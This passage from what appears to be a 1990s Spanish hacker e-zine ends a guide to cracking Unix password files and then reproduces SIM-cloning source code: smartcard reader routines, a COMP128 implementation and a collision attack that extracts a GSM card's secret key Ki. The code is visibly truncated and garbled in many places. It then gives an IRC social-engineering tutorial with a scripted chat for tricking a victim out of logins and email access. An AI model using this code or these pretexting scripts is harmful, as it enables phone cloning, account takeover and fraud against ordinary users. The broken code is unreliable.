pais extranjero, lo logico es que useis un diccionario en ese idioma, ya que asi conseguireis averiguar mas cuentas. Un buen sitio para pillar diccionarios es el siguiente url: http://sdg.ncsa.uiuc.edu/~mag/Misc/Wordlists.html Para que luego digan que no aprovechamos los recursos de la NCSA :) Y ahora un pongo una lista con los diferentes crackeadores que os podreis encontrar en Internet o en nuestra seccion de CRACK. Nombre Plataforma ------ ---------- # Crack Unix\Dos # CrackerJack Unix\Dos\Os/2 # PaceCrack95 Windows # Qcrack Dos\Windows # John the Ripper Unix\Dos\Windows # Pcrack Unix # Hades Dos # Star Cracker Dos # Killer Cracker Unix # Hellfire Cracker Dos # Xit Dos # Claymore Windows # Guess Dos # PC Unix Password Cracker Dos # Merlin Unix Por si no queda lo suficientemente claro todos estos crackeadores solo sirven para los ficheros /etc/passwd de Unix, la plataforma, es en el sistema operativo la cual corren estos programas. Para conseguir una gran variedad de crackeadores lo mejor es pasar por nuestra seccion de CRACK, en la cual podras bajarte muchos, incluido el John. En caso que algo no haya quedado claro, pues en envias un mail y lo solucionare en el proximo numero :) Byes all y hasta la vista !! CONDE VAMPIRO - J.J.F. / HACKERS TEAM - <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> \-------------------------------/ \ CLONANDO MOVILES DEL CCC / \-----------------------/ NOTA DE - J.J.F. / HACKERS TEAM - : Todo este codigo fuente fue obtenido en el website del CCC (Chaos Computer Club). Un conocido grupo de hackers alemanes. Por lo que no nos hacemos responsables del mal uso del material aqui expuesto. Este codigo es para sistemas operativos Linux. http://www.ccc.de File : getresponse.cc ------------ Codigo Fuente --------------------------------------------------- #include "getresponse.h" #include #include #include #include #define private private_hack extern "C" { #include #include #include } #undef private int timeout; SIO_INFO* si; Byte selectfile[] = { 0xa0, 0xa4, 0x00, 0x00, 0x02 }; Byte gsm_file[] = { 0x7f, 0x20 }; Byte gsm2_file[] = { 0x7f, 0x21 }; Byte get_res[] = { 0xa0, 0xc0, 0x00, 0x00, 0x00 }; Byte verify_pin[] = { 0xa0, 0x20, 0x00, 0x01, 0x08 }; Byte generate_sres[] = { 0xa0, 0x88, 0x00, 0x00, 0x10 }; void init_card(char* devicename, Byte pin[8]) { Byte buffer[32]; int i; SC_ATR * atr; SC_STATE *sc; SLOG *log; si = SIO_Open(devicename); if (si!=NULL) { /* setup for 9600, 8 data, 2 stop, even parity */ SIO_SetSpeed(si,9600); SIO_SetDataBits(si,8); SIO_SetStopBits(si,2); SIO_SetParity(si,SIO_PARITY_ODD); SIO_SetIOMode(si,SIO_IOMODE_INDIRECT); SIO_FilterEcho(si, 1); /* now actually change the line settings */ SIO_WriteSettings(si); /* trigger ATR from a Smartcard */ if(i = SCT0_GetATR(si, buffer, 32)) { atr=SC_DecodeATR(buffer, i); printf("ATR: %s\n", SC_ATR2Text(atr, 0)); SIO_Delay(si,10000); SIO_WriteBuffer(si, selectfile, 5); SIO_WaitForData(si, 1000); SIO_ReadBuffer(si, buffer, 32); SIO_WriteBuffer(si, gsm_file, 2); SIO_WaitForData(si, 1000); SIO_ReadBuffer(si, buffer, 32); if(buffer[0] != 0x9f) { printf("selecting gsm_file failed, trying DCS1800!\n"); SIO_WriteBuffer(si, selectfile, 5); SIO_WaitForData(si, 1000); SIO_ReadBuffer(si, buffer, 32); SIO_WriteBuffer(si, gsm2_file, 2); SIO_WaitForData(si, 1000); SIO_ReadBuffer(si, buffer, 32); if(buffer[0] != 0x9f) { printf("selecting gsm_file failed!\n"); exit(1); } } get_res[4] = buffer[1]; memcpy(buffer, get_res, 5); SIO_WriteBuffer(si, buffer, 5); SIO_WaitForData(si, 1000); i = SIO_ReadBuffer(si, buffer, 32); SIO_WriteBuffer(si, verify_pin, 5); SIO_WaitForData(si, 1000); i = SIO_ReadBuffer(si, buffer, 32); SIO_WriteBuffer(si, pin, 8); SIO_Delay(si,100000); SIO_WaitForData(si, 1000); i = SIO_ReadBuffer(si, buffer, 32); if(buffer[0] != 0x90) { printf("PIN verification failed!\n"); for(int j=0; j ' to start scanning. The PIN is the PIN of the card. timeout is the time the card should wait for the response, the GSM standard specifies that to be 50ms, give 50000 here. You have to change the serial device and communication parameters in the source. Sorry. Andreas ------------ FIN ------------------------------------------------------------- File : scan_collision.cc ------------ Codigo Fuente --------------------------------------------------- #include #include #include #include "getresponse.h" #undef TEST typedef unsigned char Byte; struct ltsim { bool operator()(const Byte* b1, const Byte* b2) const { return memcmp(b1, b2, 12) < 0; } }; typedef map simoutput_map; /* An implementation of the GSM A3A8 algorithm. (Specifically, COMP128.) */ /* Copyright 1998, Marc Briceno, Ian Goldberg, and David Wagner. * All rights reserved. */ /* * For expository purposes only. Coded in C merely because C is a much * more precise, concise form of expression for these purposes. See Judge * Patel if you have any problems with this... * Of course, it's only authentication, so it should be exportable for the * usual boring reasons. */ /* The compression tables. */ static const Byte table_0[512] = { 102,177,186,162, 2,156,112, 75, 55, 25, 8, 12,251,193,246,188, 109,213,151, 53, 42, 79,191,115,233,242,164,223,209,148,108,161, 252, 37,244, 47, 64,211, 6,237,185,160,139,113, 76,138, 59, 70, 67, 26, 13,157, 63,179,221, 30,214, 36,166, 69,152,124,207,116, 247,194, 41, 84, 71, 1, 49, 14, 95, 35,169, 21, 96, 78,215,225, 182,243, 28, 92,201,118, 4, 74,248,128, 17, 11,146,132,245, 48, 149, 90,120, 39, 87,230,106,232,175, 19,126,190,202,141,137,176, 250, 27,101, 40,219,227, 58, 20, 51,178, 98,216,140, 22, 32,121, 61,103,203, 72, 29,110, 85,212,180,204,150,183, 15, 66,172,196, 56,197,158, 0,100, 45,153, 7,144,222,163,167, 60,135,210,231, 174,165, 38,249,224, 34,220,229,217,208,241, 68,206,189,125,255, 239, 54,168, 89,123,122, 73,145,117,234,143, 99,129,200,192, 82, 104,170,136,235, 93, 81,205,173,236, 94,105, 52, 46,228,198, 5, 57,254, 97,155,142,133,199,171,187, 50, 65,181,127,107,147,226, 184,218,131, 33, 77, 86, 31, 44, 88, 62,238, 18, 24, 43,154, 23, 80,159,134,111, 9,114, 3, 91, 16,130, 83, 10,195,240,253,119, 177,102,162,186,156, 2, 75,112, 25, 55, 12, 8,193,251,188,246, 213,109, 53,151, 79, 42,115,191,242,233,223,164,148,209,161,108, 37,252, 47,244,211, 64,237, 6,160,185,113,139,138, 76, 70, 59, 26, 67,157, 13,179, 63, 30,221, 36,214, 69,166,124,152,116,207, 194,247, 84, 41, 1, 71, 14, 49, 35, 95, 21,169, 78, 96,225,215, 243,182, 92, 28,118,201, 74, 4,128,248, 11, 17,132,146, 48,245, 90,149, 39,120,230, 87,232,106, 19,175,190,126,141,202,176,137, 27,250, 40,101,227,219, 20, 58,178, 51,216, 98, 22,140,121, 32, 103, 61, 72,203,110, 29,212, 85,204,180,183,150, 66, 15,196,172, 197, 56, 0,158, 45,100, 7,153,222,144,167,163,135, 60,231,210, 165,174,249, 38, 34,224,229,220,208,217, 68,241,189,206,255,125, 54,239, 89,168,122,123,145, 73,234,117, 99,143,200,129, 82,192, 170,104,235,136, 81, 93,173,205, 94,236, 52,105,228, 46, 5,198, 254, 57,155, 97,133,142,171,199, 50,187,181, 65,107,127,226,147, 218,184, 33,131, 86, 77, 44, 31, 62, 88, 18,238, 43, 24, 23,154, 159, 80,111,134,114, 9, 91, 3,130, 16, 10, 83,240,195,119,253 }, table_1[256] = { 19, 11, 80,114, 43, 1, 69, 94, 39, 18,127,117, 97, 3, 85, 43, 27,124, 70, 83, 47, 71, 63, 10, 47, 89, 79, 4, 14, 59, 11, 5, 35,107,103, 68, 21, 86, 36, 91, 85,126, 32, 50,109, 94,120, 6, 53, 79, 28, 45, 99, 95, 41, 34, 88, 68, 93, 55,110,125,105, 20, 90, 80, 76, 96, 23, 60, 89, 64,121, 56, 14, 74,101, 8, 19, 78, 76, 66,104, 46,111, 50, 32, 3, 39, 0, 58, 25, 92, 22, 18, 51, 57, 65,119,116, 22,109, 7, 86, 59, 93, 62,110, 78, 99, 77, 67, 12,113, 87, 98,102, 5, 88, 33, 38, 56, 23, 8, 75, 45, 13, 75, 95, 63, 28, 49,123,120, 20,112, 44, 30, 15, 98,106, 2,103, 29, 82,107, 42,124, 24, 30, 41, 16,108,100,117, 40, 73, 40, 7,114, 82,115, 36,112, 12,102,100, 84, 92, 48, 72, 97, 9, 54, 55, 74, 113,123, 17, 26, 53, 58, 4, 9, 69,122, 21,118, 42, 60, 27, 73, 118,125, 34, 15, 65,115, 84, 64, 62, 81, 70, 1, 24,111,121, 83, 104, 81, 49,127, 48,105, 31, 10, 6, 91, 87, 37, 16, 54,116,126, 31, 38, 13, 0, 72,106, 77, 61, 26, 67, 46, 29, 96, 37, 61, 52, 101, 17, 44,108, 71, 52, 66, 57, 33, 51, 25, 90, 2,119,122, 35 }, table_2[128] = { 52, 50, 44, 6, 21, 49, 41, 59, 39, 51, 25, 32, 51, 47, 52, 43, 37, 4, 40, 34, 61, 12, 28, 4, 58, 23, 8, 15, 12, 22, 9, 18, 55, 10, 33, 35, 50, 1, 43, 3, 57, 13, 62, 14, 7, 42, 44, 59, 62, 57, 27, 6, 8, 31, 26, 54, 41, 22, 45, 20, 39, 3, 16, 56, 48, 2, 21, 28, 36, 42, 60, 33, 34, 18, 0, 11, 24, 10, 17, 61, 29, 14, 45, 26, 55, 46, 11, 17, 54, 46, 9, 24, 30, 60, 32, 0, 20, 38, 2, 30, 58, 35, 1, 16, 56, 40, 23, 48, 13, 19, 19, 27, 31, 53, 47, 38, 63, 15, 49, 5, 37, 53, 25, 36, 63, 29, 5, 7 }, table_3[64] = { 1, 5, 29, 6, 25, 1, 18, 23, 17, 19, 0, 9, 24, 25, 6, 31, 28, 20, 24, 30, 4, 27, 3, 13, 15, 16, 14, 18, 4, 3, 8, 9, 20, 0, 12, 26, 21, 8, 28, 2, 29, 2, 15, 7, 11, 22, 14, 10, 17, 21, 12, 30, 26, 27, 16, 31, 11, 7, 13, 23, 10, 5, 22, 19 }, table_4[32] = { 15, 12, 10, 4, 1, 14, 11, 7, 5, 0, 14, 7, 1, 2, 13, 8, 10, 3, 4, 9, 6, 0, 3, 2, 5, 6, 8, 9, 11, 13, 15, 12 }, *table[5] = { table_0, table_1, table_2, table_3, table_4 }; /* * rand[0..15]: the challenge from the base station * key[0..15]: the SIM's A3/A8 long-term key Ki * simoutput[0..11]: what you'd get back if you fed rand and key to a real * SIM. * * The GSM spec states that simoutput[0..3] is SRES, * and simoutput[4..11] is Kc (the A5 session key). * (See GSM 11.11, Section 8.16. See also the leaked document * referenced below.) * Note that Kc is bits 74..127 of the COMP128 output, followed by 10 * zeros. * In other words, A5 is keyed with only 54 bits of entropy. This * represents a deliberate weakening of the key used for voice privacy * by a factor of over 1000. * * Verified with a Pacific Bell Schlumberger SIM. Your mileage may vary. * * Marc Briceno , Ian Goldberg , * and David Wagner *//* * This code derived from a leaked document from the GSM standards. * Some missing pieces were filled in by reverse-engineering a working SIM. * We have verified that this is the correct COMP128 algorithm. * * The first page of the document identifies it as * _Technical Information: GSM System Security Study_. * 10-1617-01, 10th June 1988. * The bottom of the title page is marked * Racal Research Ltd. * Worton Drive, Worton Grange Industrial Estate, * Reading, Berks. RG2 0SB, England. * Telephone: Reading (0734) 868601 Telex: 847152 * The relevant bits are in Part I, Section 20 (pages 66--67). Enjoy! * * Note: There are three typos in the spec (discovered by * reverse-engineering). * First, "z = (2 * x[n] + x[n]) mod 2^(9-j)" should clearly read * "z = (2 * x[m] + x[n]) mod 2^(9-j)". * Second, the "k" loop in the "Form bits from bytes" section is severely * botched: the k index should run only from 0 to 3, and clearly the range * on "the (8-k)th bit of byte j" is also off (should be 0..7, not 1..8, * to be consistent with the subsequent section). * Third, SRES is taken from the first 8 nibbles of x[], not the last 8 as * claimed in the document. (And the document doesn't specify how Kc is * derived, but that was also easily discovered with reverse engineering.) * All of these typos have been corrected in the following code. */ void A3A8(/* in */ Byte rand[16], /* in */ Byte key[16], /* out */ Byte simoutput[12]) { Byte x[32], bit[128]; int i, j, k, l, m, n, y, z, next_bit; /* ( Load RAND into last 16 bytes of input ) */ for (i=16; i<32; i++) x[i] = rand[i-16]; /* ( Loop eight times ) */ for (i=1; i<9; i++) { /* ( Load key into first 16 bytes of input ) */ for (j=0; j<16; j++) x[j] = key[j]; /* ( Perform substitutions ) */ for (j=0; j<5; j++) for (k=0; k<(1<>(3-k)) & 1; /* ( Permutation but not on the last loop ) */ if (i < 8) for (j=0; j<16; j++) { x[j+16] = 0; for (k=0; k<8; k++) { next_bit = ((8*j + k)*17) % 128; x[j+16] |= bit[next_bit] << (7-k); } } } /* * ( At this stage the vector x[] consists of 32 nibbles. * The first 8 of these are taken as the output SRES. ) */ /* The remainder of the code is not given explicitly in the * standard, but was derived by reverse-engineering. */ for (i=0; i<4; i++) simoutput[i] = (x[2*i]<<4) | x[2*i+1]; for (i=0; i<6; i++) simoutput[4+i] = (x[2*i+18]<<6) | (x[2*i+18+1]<<2) | (x[2*i+18+2]>>2); simoutput[4+6] = (x[2*6+18]<<6) | (x[2*6+18+1]<<2); simoutput[4+7] = 0; } int hextoint(char x) { x = toupper(x); if (x >= 'A' && x <= 'F') return x-'A'+10; else if (x >= '0' && x <= '9') return x-'0'; fprintf(stderr, "bad input.\n"); exit(1); return 0; } int main(int argc, char **argv) { Byte pin[8] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; Byte key[16], simoutput[12]; int i,j,k,l; simoutput_map* simmap; Byte* collision_map[8][2]; #ifdef TEST if (argc != 2 || strlen(argv[1]) != 34 || strncmp(argv[1], "0x", 2) != 0) { fprintf(stderr, "Usage: %s 0x\n", argv[0]); exit(1); } for (i=0; i<16; i++) key[i] = (hextoint(argv[1][2*i+2])<<4) | hextoint(argv[1][2*i+3]); #else if (argc != 3) { fprintf(stderr, "Usage: %s \n", argv[0]); exit(1); } for (i=0; icount(newoutput)) { printf("\nCollision for i=%i: ", i); for (l=0; l<16; l++) printf("%02X", newrand[l]); printf(" "); for (l=0; l<16; l++) printf("%02X", (*simmap)[newoutput][l]); j=256; k=256; collision_map[i][0] = new Byte[16]; collision_map[i][1] = new Byte[16]; memcpy(collision_map[i][0], newrand, 16); memcpy(collision_map[i][1], (*simmap)[newoutput], 16); } else { #ifdef VERBOSE for (l=0; l<16; l++) printf("%02X", newrand[l]); printf(" "); for (l=0; l<12; l++) printf("%02X", newoutput[l]); printf("\n"); #endif (*simmap)[newoutput]=newrand; } fflush(stdout); } } printf("\n"); for(simoutput_map::iterator I=simmap->begin(); I!=simmap->end(); I++) { delete (*I).first; delete (*I).second; // simmap.erase(I); } delete simmap; } Byte newkey[16]; Byte resultkey[16]; Byte res1[16], res2[16]; memset(resultkey, 0, 16); for(i=0; i<8; i++) { memset(newkey, 0, 16); for(j=0; j<256; j++) { newkey[i]=j; fprintf(stderr, "."); for(k=0; k<256; k++) { newkey[i+8]=k; A3A8(collision_map[i][0], newkey, res1); A3A8(collision_map[i][1], newkey, res2); if(!memcmp(res1, res2, 12)) { resultkey[i]=j; resultkey[i+8]=k; printf("\nKey bytes found, Ki so far: "); for (l=0; l<16; l++) printf("%02X", resultkey[l]); j = 256; k = 256; } } } printf("\n"); } printf("\nAnd the Ki is: "); for (l=0; l<16; l++) printf("%02X", resultkey[l]); printf("\n"); return 0; } ------------ FIN ------------------------------------------------------------- File : SCT0.C ------------ Codigo Fuente --------------------------------------------------- /* sct0.c - Smartcard T=0 related functions * * Copyright 1993-1997, Tim Hudson. All rights reserved. * * You can pretty much do what you like with this code except pretend that * you wrote it provided that any derivative of this code includes the * above comments unchanged. If you put this in a product then attribution * is mandatory. See the details in the COPYING file. * * Tim Hudson * tjh@cryptsoft.com * */ #include #include #include #include #include "sio.h" #include "sct0.h" static int dbglev=0; static SLOG *outf=NULL; /* max number of times we retry a probe when we don't get back * something that is a valid response */ #define MAX_RETRIES 2 int SCT0_SetDebug(int lev) { int oldlev; oldlev=dbglev; dbglev=lev; return(oldlev); } int SCT0_GetDebug(void) { return(dbglev); } int SCT0_SetDebugLog(SLOG *slog) { if (outf!=NULL) SLOG_close(outf); outf=slog; return(1); } int SCT0_Reset(SIO_INFO *s) { int ch; /* flush any data in the buffer - this is important */ while ((ch=SIO_ReadChar(s))!=-1) ; /* toggle RTS to trigger reset */ #if 0 SIO_DropRTS(s); SIO_Delay(s,25); SIO_RaiseRTS(s); SIO_Delay(s,25); #endif #if 1 SIO_RaiseRTS(s); SIO_Delay(s,25); SIO_DropRTS(s); SIO_Delay(s,25); #endif return(1); } int SCT0_GetATR(SIO_INFO *s,char *buf,int bufsize) { int i,n,ch; SCT0_Reset(s); /* now read in whatever data is available */ n=0; /* we have two shots at doing this ... some cards are a little * slow at responding */ for(i=0;i<2;i++) { while ((ch=SIO_ReadChar(s))!=-1) { if (buf!=NULL) { if (n>=bufsize) break; buf[n++]=(ch & 0xff); } } } return(n); } /* we maintain a table of settings that it makes sense to scan through * when looking for the communication settings for use with a particular * smartcard ... the order here is setup to match the most likely things * first so you probably shouldn't play with it. */ static long all_speed[]={9600L,19200L,38400L,115200L}; static int all_parity[]={SIO_PARITY_EVEN,SIO_PARITY_ODD,SIO_PARITY_NONE}; static int all_databits[]={8,7}; static int all_stopbits[]={2,1}; static int all_iomode[]={SIO_IOMODE_DIRECT,SIO_IOMODE_INDIRECT}; #define N_all_speed (sizeof(all_speed)/sizeof(all_speed[0])) #define N_all_parity (sizeof(all_parity)/sizeof(all_parity[0])) #define N_all_databits (sizeof(all_databits)/sizeof(all_databits[0])) #define N_all_stopbits (sizeof(all_stopbits)/sizeof(all_stopbits[0])) #define N_all_iomode (sizeof(all_iomode)/sizeof(all_iomode[0])) int SCT0_ScanForATR(SIO_INFO *s,char *ubuf,int ubufsiz) { long aspeed; int aparity,adatabits,astopbits,aiomode; char buf[256]; int len; for(aspeed=0;aspeed0) { if (dbglev) { /* dump the record */ SLOG_printf(outf,"ATR-DATA: "); SLOG_dump(outf,buf,len,0); SLOG_printf(outf,"\n"); SLOG_printf(outf,"ATR-TEXT: "); SLOG_dump(outf,buf,len,1); SLOG_printf(outf,"\n"); } /* it has to be a valid ATR response before we * consider that it has worked */ if ((buf[0]==0x3f)||(buf[0]==0x3b)) { /* copy into the users buffer */ if ((ubuf!=NULL)&&(len<=ubufsiz)) memcpy(ubuf,buf,len); return(len); } } } return(0); } int SCT0_ScanClasses(SIO_INFO *s,char *classlist) { int i,j,len; unsigned char buf[BUFSIZ]; int retries,reset_done; /* flush data ... read until nothing available */ while (SIO_ReadChar(s)!=-1) ; reset_done=retries=0; for(i=0;i<=255;i++) { do_again: ; buf[0]=i; /* CLA = 0 */ buf[1]=0x0; buf[2]=0x0; buf[3]=0x0; buf[4]=0x0; len=SIO_WriteBuffer(s,buf,5); /* we need to delay before reading to give the reader time * to start responding */ SIO_Delay(s,100); /* now read in some data */ for(j=0;j<2;j++) { len=SIO_ReadBuffer(s,buf,sizeof(buf)); if (len>0) break; } if (dbglev) { SLOG_printf(outf,"CLA 0x%02x: (%d) ",i,len); SLOG_dump(outf,buf,len,0); SLOG_printf(outf,"\n"); } if (len!=2) { if (retries++>MAX_RETRIES) { if (!reset_done) { /* reset things ... some cards defend against * a probe like this */ SCT0_Reset(s); while (SIO_ReadChar(s)!=-1) ; reset_done++; if (dbglev) { SLOG_printf(outf,"CLA 0x%02x: SKIPPING with RESET\n",i); } /* skip to next INS */ continue; } return (-1); } goto do_again; } /* process the result ... 6e 00 means the class doesn't exist */ if (buf[0]!=0x6e) classlist[i]=1; else classlist[i]=0; reset_done=0; } return(1); } int SCT0_ScanInstructions(SIO_INFO *s,char theclass,char *inslist) { int i,j,len; unsigned char buf[BUFSIZ]; int retries; if (dbglev) SLOG_printf(outf,"INS scan for CLASS 0x%02x\n",theclass & 0xff); /* flush data ... read until nothing available */ while (SIO_ReadChar(s)!=-1) ; retries=0; for(i=0;i<=255;i++) { do_again: ; buf[0]=theclass; /* CLA = 0 */ buf[1]=i; /* instruction */ buf[2]=0x0; buf[3]=0x0; buf[4]=0x0; len=SIO_WriteBuffer(s,buf,5); /* we need to delay before reading to give the reader time * to start responding */ SIO_Delay(s,100); /* now read in some data */ for(j=0;j<2;j++) { len=SIO_ReadBuffer(s,buf,sizeof(buf)); if (len>0) break; } if (dbglev) { SLOG_printf(outf,"INS 0x%02x: (%d) ",i,len); SLOG_dump(outf,buf,len,0); SLOG_printf(outf,"\n"); } /* we could get back a response to a command that didn't * need any parameters ... which we should handle */ if (len==3) { if ((buf[0] & 0xff)==i) { /* process the result ... 6e 00 or 6d 00 means the instruction * doesn't exist ... 6d=unknown, 6e=wrong */ if ((buf[1]!=0x6e)&&(buf[1]!=0x6d)) inslist[i]=1; else inslist[i]=0; continue; } else { /* SLOG_printf(outf,"len=3 i=0x%x buf[0]=0x%x\n",i,buf[0]); */ } } if (len!=2) { if (retries++>MAX_RETRIES) return (-1); goto do_again; } /* process the result ... 6e 00 or 6d 00 means the instruction * doesn't exist ... 6d=unknown, 6e=wrong */ if ((buf[0]!=0x6e)&&(buf[0]!=0x6d)) inslist[i]=1; else inslist[i]=0; } return(1); } int SCT0_ScanFiles(SIO_INFO *s,char theclass,char thefile,char *filelist) { int i,j,len; unsigned char buf[BUFSIZ]; int retries; if (dbglev) SLOG_printf(outf,"FILE scan for CLASS 0x%02x file 0x%02x\n", theclass & 0xff, thefile & 0xff); /* flush data ... read until nothing available */ while (SIO_ReadChar(s)!=-1) ; retries=0; for(i=0;i<=255;i++) { do_again: ; buf[0]=theclass; /* CLA = 0 */ buf[1]=0xa4; /* instruction */ buf[2]=0x0; buf[3]=0x0; buf[4]=0x2; len=SIO_WriteBuffer(s,buf,5); /* we need to delay before reading to give the reader time * to start responding */ SIO_Delay(s,100); /* now read in some data - which should be the INS */ for(j=0;j<2;j++) { len=SIO_ReadBuffer(s,buf,sizeof(buf)); if (len>0) break; } if (dbglev) { SLOG_printf(outf,"FILE 0x%02x: (%d) [INS] ",i,len); SLOG_dump(outf,buf,len,0); SLOG_printf(outf,"\n"); } if (len!=1) { if (retries++>MAX_RETRIES) return (-1); goto do_again; } /* we must get the INS back or things are broken! */ if (buf[0]!=0xa4) { if (dbglev) SLOG_printf(outf,"ScanFiles - didn't get back INS - aborting scan\n"); return (-1); } /* now send the file ID */ buf[0]=thefile; buf[1]=i; len=SIO_WriteBuffer(s,buf,2); /* we need to delay before reading to give the reader time * to start responding */ SIO_Delay(s,100); /* now read in some data - which should be the response code */ for(j=0;j<2;j++) { len=SIO_ReadBuffer(s,buf,sizeof(buf)); if (len>0) break; } if (dbglev) { SLOG_printf(outf,"FILE 0x%02x: (%d) [RES] ",i,len); SLOG_dump(outf,buf,len,0); SLOG_printf(outf,"\n"); } if (len!=2) { if (retries++>MAX_RETRIES) return (-1); goto do_again; } /* process the result * 61 xx is okay with length (Schlumberger Cryptoflex) * 9x 00 is okay (Chipknip?) */ if ( (((buf[0] & 0xf0)==0x90) && (buf[1]==0)) || (buf[0]==0x61) ) { filelist[i]=1; /* now we need to select the MF again otherwise we can end * up confused with going down a directory level which isn't * what we want */ } else filelist[i]=0; } return(1); } int SCT0_ScanForResponse(SIO_INFO *s,char *ubuf,int ubufsiz) { long aspeed; int aparity,adatabits,astopbits,aiomode; char buf[256]; int len,j; /* for(aspeed=0;aspeed0) break; } if (1||dbglev) { SLOG_printf(outf,"settings: %s\n",SIO_GetSettingsString(s)); SLOG_printf(outf,"RESPONSE TO COMMAND\n"); SLOG_dump(outf,buf,len,0); SLOG_printf(outf,"\n"); } } return(0); } ------------ FIN ------------------------------------------------------------- Pues disfrutarlo y sed inteligentes con el codigo fuente, lo recomendable seria que pasarais por el website del CCC y tambien por los urlïs que se indican en el File Readme.gsm. Byes. - J.J.F. / HACKERS TEAM - <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> heres libre de poner esto en tu pagina web, distribuirlo en bbs o de la forma que tede la gana 'siempre y cuando respetes este encabezado' texto escrito,maquetado,y todo lo demas por: ZeD dudas comentarios,etc.. a zed@mixmail.com------- www.angelfire.com/ak/HACKZED/ZED2.html miembro del HaCk`S-wEb-RiNg=http://come.to/HaCkS-wEb-RiNg ------------------------------------------------------------------------------ ############################################### # ¨QUE SE PUEDE HACER EN EL IRC? # ############################################### POR: ZeD Hay mucha gente (la mayoria) que se mete en el Irc,para conversar con gente de otros paises o ciudades,en realidad para eso se creo el Irc (Internet Relay Chat). Luego con la aparicion de los primeros script`s para el Irc, se empezaron a pasar fotos, y otras clases de archivos gracias a la opcion de "f-server",que aportaban estos. Mas tarde se empezaron a crear las primeras "armas" (y defensas),para lo que hoy denominados "Irc-War",de todos es conocido el "Winnuke",y todos (o la mayoria) de los script`s modernos incluyen alguna opcion referente al "Irc-War". Vale,todo esto esta muy bien,pero.... (ahora llega lo bueno del Irc) al conocer a tanta gente,muchas veces (la mayoria),nos cruzamos con el tipico tiparraco que se las da de listo y que dice que se sabe todos los trucos (en realidad no saben ni de lo que les hablas la mayoria de las veces),y lo mejor que puedes hacer con esta gente es aprovecharte de su "sabiduria". ¨Para que?,pues para conseguir passwords, loggins, direcciones y si te lo montas bien lo que le quieras sacar. El perfil de estos individuos suele ser un caracter alegre y muy hablador, aqui esta su mayor punto debil. Hablan y la mayoria de las veces lo hacen demasiado, aqui es donde entras tu. Desde luego si al tio (por muy tonto que sea), le entras diciendole lo tipico de: "oye veras esque se me a jodido un archivo del Güindows, y queria saber si me podias pasar el tuyo, es un archivo que esta en la carpeta de windows, tiene de extension .pwl", el tio lo mas probable es que desconfie y o te ignore, o que te diga que usa el "Nt". Tienes que usar todo tu ingenio y astucia para hacerte "colegilla" sullo. Lo primero que debes hacer es ponerte otro nick que no vallas a usar nada mas que cuando vallas a hablar con el, ademas para que sea mas creible este nick estaria bien que fuese algo normal como: latino, juan y cosas asi. No te pongas El_SeÑoR_dEl_dEsAsTrE, por que lo mas probabla es que te mande a freir monas. Entra en canales donde habitualmente la gente no sea muy experta en ordenadores,como #sexo o #fotoxXx, aqui es donde la gente mas se enrolla y es de donde puedes sacar mas probecho de tu tiempo. Lo siguiente es usar algo de "ingenieria social". si le entras al tio como te he dicho antes no te hara ni caso, lo mejor que puedes hacer es, por ejemplo si estas en un canal de fotoxXx intentar conseguir el pass y el logging de alguna pagina porno yaque en esta clase de canales hay muchas personas que son socias de alguna pagina X. por ejemplo digamos que has localizado a un tio que crees que pueda ser socio de la pagina depago del Play Boy, un ejemplo de como conseguir su pass y su loggin seria esta conversacion en un chat privado: (tu heres juan y el pepe) ->juan: oye he estado viendo las fotos que me has cambiado y me he dado cuenta de que hay muchas del Play Boy ¨de donde las has sacado? ->pepe: de la pagina ->juan: ¨heres socio? ->pepe: si ->juan: joder pues tienes que tenr mogollon de pelas, por que eso tiene que salir caro ¨no? ->pepe: no te creas solo cobran 25$ al mes ->juan: hombre barato, barato, no es... ¨que tuviste que hacer para hacerte socio? ->pepe: pues poca cosa, rellene un formulario de inscripcion y a los dos dias ya tenia mi clave y mi nombre de usuario ->juan: a mi hace unos dias me dieron un nombre y una clave, pero ya no funcionaba ->pepe: es posible, los cambian cada 2 semanas aqui ya te has enterado de que las claves de acceso a la pagina de socios del Play Boy las cambian cada 2 semanas ->juan: ¨y como os las comunican por e-mail? ->pepe: si ahora lo que tienes que conseguir es que te de su direccion de e-mail, si tienes suerte a donde se lo manden sera a un servicio de e-mail gratuito tipo "latinmail". Esto pasa asi la mayoria de las veces debido a que el correo tambien lo use su padre, y no creo que le agrade ver como su hijo se gasta la paga en pagar un acceso a una pagina pornografica. La mayoria de los servicios gratuitos de e-mail disponen de un servicio extra de "recordatorio de contrase¤as" a la que puedes acceder si pones la direccion de e-mail (pepe@latinmail.com por ejemplo), y su grupo preferido de musica. En estos casos mientras estas hablando con el lo mejor que puedes hacer escuando te de su direccion de e-mail, visita su servidor y veras si la direccion de e-mail es de uno de estos servios gratuitos. Si no es asi intenta sonsacarle a que direccion de e-mail le mandan los passwords. Pongamos que se lo mandan a la 